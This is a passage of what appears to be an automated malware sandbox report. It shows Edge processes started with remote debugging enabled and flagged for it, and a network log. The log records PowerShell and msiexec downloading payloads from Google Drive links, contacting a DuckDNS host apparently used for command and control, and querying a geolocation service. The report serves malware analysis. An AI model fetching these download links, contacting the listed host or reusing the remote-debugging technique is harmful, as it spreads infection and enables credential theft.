                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffef06a46f8,0x7ffef06a4708,0x7ffef06a4718
                  4⤵
                    PID:2552
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2228,9625088108827471120,7102101110156382875,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:2
                    4⤵
                      PID:3124
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2228,9625088108827471120,7102101110156382875,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:3
                      4⤵
                        PID:4592
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2228,9625088108827471120,7102101110156382875,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2840 /prefetch:8
                        4⤵
                          PID:2704
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2228,9625088108827471120,7102101110156382875,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
                          4⤵
                          • Uses browser remote debugging
                          PID:2032
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2228,9625088108827471120,7102101110156382875,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
                          4⤵
                          • Uses browser remote debugging
                          PID:4656
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2228,9625088108827471120,7102101110156382875,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
                          4⤵
                          • Uses browser remote debugging
                          PID:1620
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2228,9625088108827471120,7102101110156382875,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1
                          4⤵
                          • Uses browser remote debugging
                          PID:4308
                  • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                    1⤵
                      PID:3248
                    • C:\Windows\System32\CompPkgSrv.exe
                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                      1⤵
                        PID:2300
                      • C:\Windows\System32\CompPkgSrv.exe
                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                        1⤵
                          PID:4268

                        Network

                        • flag-us
                          DNS
                          240.221.184.93.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          240.221.184.93.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          13.86.106.20.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          13.86.106.20.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          drive.google.com
                          msiexec.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          drive.google.com
                          IN A
                          Response
                          drive.google.com
                          IN A
                          142.250.187.206
                        • flag-gb
                          GET
                          https://drive.google.com/uc?export=download&id=1p7KVTjLQHcR--4rSBwn5YLkXzE5yuZz8
                          powershell.exe
                          Remote address:
                          142.250.187.206:443
                          Request
                          GET /uc?export=download&id=1p7KVTjLQHcR--4rSBwn5YLkXzE5yuZz8 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                          Host: drive.google.com
                          Connection: Keep-Alive
                          Response
                          HTTP/1.1 303 See Other
                          Content-Type: application/binary
                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                          Pragma: no-cache
                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                          Date: Mon, 18 Nov 2024 10:16:07 GMT
                          Location: https://drive.usercontent.google.com/download?id=1p7KVTjLQHcR--4rSBwn5YLkXzE5yuZz8&export=download
                          Strict-Transport-Security: max-age=31536000
                          Cross-Origin-Opener-Policy: same-origin
                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                          Content-Security-Policy: script-src 'nonce-9FsCweski1MAGYLi43mdlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                          Server: ESF
                          Content-Length: 0
                          X-XSS-Protection: 0
                          X-Frame-Options: SAMEORIGIN
                          X-Content-Type-Options: nosniff
                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                        • flag-us
                          DNS
                          206.187.250.142.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          206.187.250.142.in-addr.arpa
                          IN PTR
                          Response
                          206.187.250.142.in-addr.arpa
                          IN PTR
                          lhr25s33-in-f141e100net
                        • flag-us
                          DNS
                          68.32.126.40.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          68.32.126.40.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          drive.usercontent.google.com
                          msiexec.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          drive.usercontent.google.com
                          IN A
                          Response
                          drive.usercontent.google.com
                          IN A
                          142.250.180.1
                        • flag-gb
                          GET
                          https://drive.usercontent.google.com/download?id=1p7KVTjLQHcR--4rSBwn5YLkXzE5yuZz8&export=download
                          powershell.exe
                          Remote address:
                          142.250.180.1:443
                          Request
                          GET /download?id=1p7KVTjLQHcR--4rSBwn5YLkXzE5yuZz8&export=download HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                          Host: drive.usercontent.google.com
                          Connection: Keep-Alive
                          Response
                          HTTP/1.1 200 OK
                          Content-Type: application/octet-stream
                          Content-Security-Policy: sandbox
                          Content-Security-Policy: default-src 'none'
                          Content-Security-Policy: frame-ancestors 'none'
                          X-Content-Security-Policy: sandbox
                          Cross-Origin-Opener-Policy: same-origin
                          Cross-Origin-Embedder-Policy: require-corp
                          Cross-Origin-Resource-Policy: same-site
                          X-Content-Type-Options: nosniff
                          Content-Disposition: attachment; filename="Filmningens.lzh"
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Credentials: false
                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Places-Ios-Sdk, X-Android-Package, X-Android-Cert, X-Places-Android-Sdk, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt, X-Cloud-Trace-Context, traceparent, x-goog-chat-space-id, x-goog-pan-request-context, X-AppInt-Credentials
                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                          Accept-Ranges: bytes
                          Content-Length: 486912
                          Last-Modified: Mon, 18 Nov 2024 00:13:46 GMT
                          X-GUploader-UploadID: AFiumC7GFHOKg6fI8jL_7Uu9ZXPw0wZU43B8kmaO8blJkkkG1zFynecalI0aLflPcxtx854h_rg-yq8ZNA
                          Date: Mon, 18 Nov 2024 10:16:10 GMT
                          Expires: Mon, 18 Nov 2024 10:16:10 GMT
                          Cache-Control: private, max-age=0
                          X-Goog-Hash: crc32c=xDPu9A==
                          Server: UploadServer
                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                        • flag-us
                          DNS
                          95.221.229.192.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          95.221.229.192.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          1.180.250.142.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          1.180.250.142.in-addr.arpa
                          IN PTR
                          Response
                          1.180.250.142.in-addr.arpa
                          IN PTR
                          lhr25s32-in-f11e100net
                        • flag-us
                          DNS
                          58.55.71.13.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          58.55.71.13.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          241.150.49.20.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          241.150.49.20.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          197.87.175.4.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          197.87.175.4.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          241.42.69.40.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          241.42.69.40.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          172.210.232.199.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          172.210.232.199.in-addr.arpa
                          IN PTR
                          Response
                        • flag-gb
                          GET
                          https://drive.google.com/uc?export=download&id=1fpdJ310VQ7rWgJr6mXfksRa2CZZgfNgR
                          msiexec.exe
                          Remote address:
                          142.250.187.206:443
                          Request
                          GET /uc?export=download&id=1fpdJ310VQ7rWgJr6mXfksRa2CZZgfNgR HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                          Host: drive.google.com
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 303 See Other
                          Content-Type: application/binary
                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                          Pragma: no-cache
                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                          Date: Mon, 18 Nov 2024 10:16:42 GMT
                          Location: https://drive.usercontent.google.com/download?id=1fpdJ310VQ7rWgJr6mXfksRa2CZZgfNgR&export=download
                          Strict-Transport-Security: max-age=31536000
                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                          Content-Security-Policy: script-src 'nonce-jG5YMIfx57wWzo1xCxVuQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                          Cross-Origin-Opener-Policy: same-origin
                          Server: ESF
                          Content-Length: 0
                          X-XSS-Protection: 0
                          X-Frame-Options: SAMEORIGIN
                          X-Content-Type-Options: nosniff
                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                        • flag-us
                          DNS
                          c.pki.goog
                          msiexec.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          c.pki.goog
                          IN A
                          Response
                          c.pki.goog
                          IN CNAME
                          pki-goog.l.google.com
                          pki-goog.l.google.com
                          IN A
                          216.58.201.99
                        • flag-gb
                          GET
                          http://c.pki.goog/r/r1.crl
                          msiexec.exe
                          Remote address:
                          216.58.201.99:80
                          Request
                          GET /r/r1.crl HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          User-Agent: Microsoft-CryptoAPI/10.0
                          Host: c.pki.goog
                          Response
                          HTTP/1.1 200 OK
                          Accept-Ranges: bytes
                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                          Cross-Origin-Resource-Policy: cross-origin
                          Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                          Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                          Content-Length: 854
                          X-Content-Type-Options: nosniff
                          Server: sffe
                          X-XSS-Protection: 0
                          Date: Mon, 18 Nov 2024 09:34:45 GMT
                          Expires: Mon, 18 Nov 2024 10:24:45 GMT
                          Cache-Control: public, max-age=3000
                          Age: 2516
                          Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                          Content-Type: application/pkix-crl
                          Vary: Accept-Encoding
                        • flag-us
                          DNS
                          o.pki.goog
                          msiexec.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          o.pki.goog
                          IN A
                          Response
                          o.pki.goog
                          IN CNAME
                          pki-goog.l.google.com
                          pki-goog.l.google.com
                          IN A
                          216.58.201.99
                        • flag-gb
                          GET
                          http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEGoFYJ0C3qQCbRh5xcgwPQ%3D
                          msiexec.exe
                          Remote address:
                          216.58.201.99:80
                          Request
                          GET /wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEGoFYJ0C3qQCbRh5xcgwPQ%3D HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          User-Agent: Microsoft-CryptoAPI/10.0
                          Host: o.pki.goog
                          Response
                          HTTP/1.1 200 OK
                          Server: ocsp_responder
                          Content-Length: 471
                          X-XSS-Protection: 0
                          X-Frame-Options: SAMEORIGIN
                          Date: Mon, 18 Nov 2024 09:56:16 GMT
                          Cache-Control: public, max-age=14400
                          Content-Type: application/ocsp-response
                          Age: 1226
                        • flag-gb
                          GET
                          http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDHA1yyGqTiRQmAB36tPEBH
                          msiexec.exe
                          Remote address:
                          216.58.201.99:80
                          Request
                          GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDHA1yyGqTiRQmAB36tPEBH HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          User-Agent: Microsoft-CryptoAPI/10.0
                          Host: o.pki.goog
                          Response
                          HTTP/1.1 200 OK
                          Server: ocsp_responder
                          Content-Length: 472
                          X-XSS-Protection: 0
                          X-Frame-Options: SAMEORIGIN
                          Date: Mon, 18 Nov 2024 09:53:52 GMT
                          Cache-Control: public, max-age=14400
                          Content-Type: application/ocsp-response
                          Age: 1370
                        • flag-us
                          DNS
                          99.201.58.216.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          99.201.58.216.in-addr.arpa
                          IN PTR
                          Response
                          99.201.58.216.in-addr.arpa
                          IN PTR
                          prg03s02-in-f31e100net
                          99.201.58.216.in-addr.arpa
                          IN PTR
                          lhr48s48-in-f3�G
                          99.201.58.216.in-addr.arpa
                          IN PTR
                          prg03s02-in-f99�G
                        • flag-gb
                          GET
                          https://drive.usercontent.google.com/download?id=1fpdJ310VQ7rWgJr6mXfksRa2CZZgfNgR&export=download
                          msiexec.exe
                          Remote address:
                          142.250.180.1:443
                          Request
                          GET /download?id=1fpdJ310VQ7rWgJr6mXfksRa2CZZgfNgR&export=download HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                          Cache-Control: no-cache
                          Host: drive.usercontent.google.com
                          Connection: Keep-Alive
                          Response
                          HTTP/1.1 200 OK
                          Content-Type: application/octet-stream
                          Content-Security-Policy: sandbox
                          Content-Security-Policy: default-src 'none'
                          Content-Security-Policy: frame-ancestors 'none'
                          X-Content-Security-Policy: sandbox
                          Cross-Origin-Opener-Policy: same-origin
                          Cross-Origin-Embedder-Policy: require-corp
                          Cross-Origin-Resource-Policy: same-site
                          X-Content-Type-Options: nosniff
                          Content-Disposition: attachment; filename="OKamKTWv72.bin"
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Credentials: false
                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Places-Ios-Sdk, X-Android-Package, X-Android-Cert, X-Places-Android-Sdk, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt, X-Cloud-Trace-Context, traceparent, x-goog-chat-space-id, x-goog-pan-request-context, X-AppInt-Credentials
                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                          Accept-Ranges: bytes
                          Content-Length: 493120
                          Last-Modified: Mon, 18 Nov 2024 00:12:06 GMT
                          X-GUploader-UploadID: AFiumC5FEAPuv41-dM9BaCUnWBqLgJi_MNYjRwlWktFKhQu4GL00WpkpuBqqXbyFvCaGx1KwpxPy-fEYCA
                          Date: Mon, 18 Nov 2024 10:16:44 GMT
                          Expires: Mon, 18 Nov 2024 10:16:44 GMT
                          Cache-Control: private, max-age=0
                          X-Goog-Hash: crc32c=cJCQZg==
                          Server: UploadServer
                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                        • flag-us
                          DNS
                          jwdtcx3kfb.duckdns.org
                          msiexec.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          jwdtcx3kfb.duckdns.org
                          IN A
                          Response
                          jwdtcx3kfb.duckdns.org
                          IN A
                          154.216.18.79
                        • flag-us
                          DNS
                          79.18.216.154.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          79.18.216.154.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          geoplugin.net
                          msiexec.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          geoplugin.net
                          IN A
                          Response
                          geoplugin.net
                          IN A
                          178.237.33.50
                        • flag-nl
                          GET
                          http://geoplugin.net/json.gp
                          msiexec.exe
                          Remote address:
                          178.237.33.50:80
                          Request
                          GET /json.gp HTTP/1.1
                          Host: geoplugin.net
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          date: Mon, 18 Nov 2024 10:16:47 GMT
                          server: Apache
                          content-length: 956
                          content-type: application/json; charset=utf-8
                          cache-control: public, max-age=300
                          access-control-allow-origin: *
                        • flag-us
                          DNS
                          50.33.237.178.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          50.33.237.178.in-addr.arpa
                          IN PTR
                          Response
                          50.33.237.178.in-addr.arpa
                          IN CNAME
                          50.32/27.178.237.178.in-addr.arpa
                        • flag-us
                          DNS
                          35.200.250.142.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
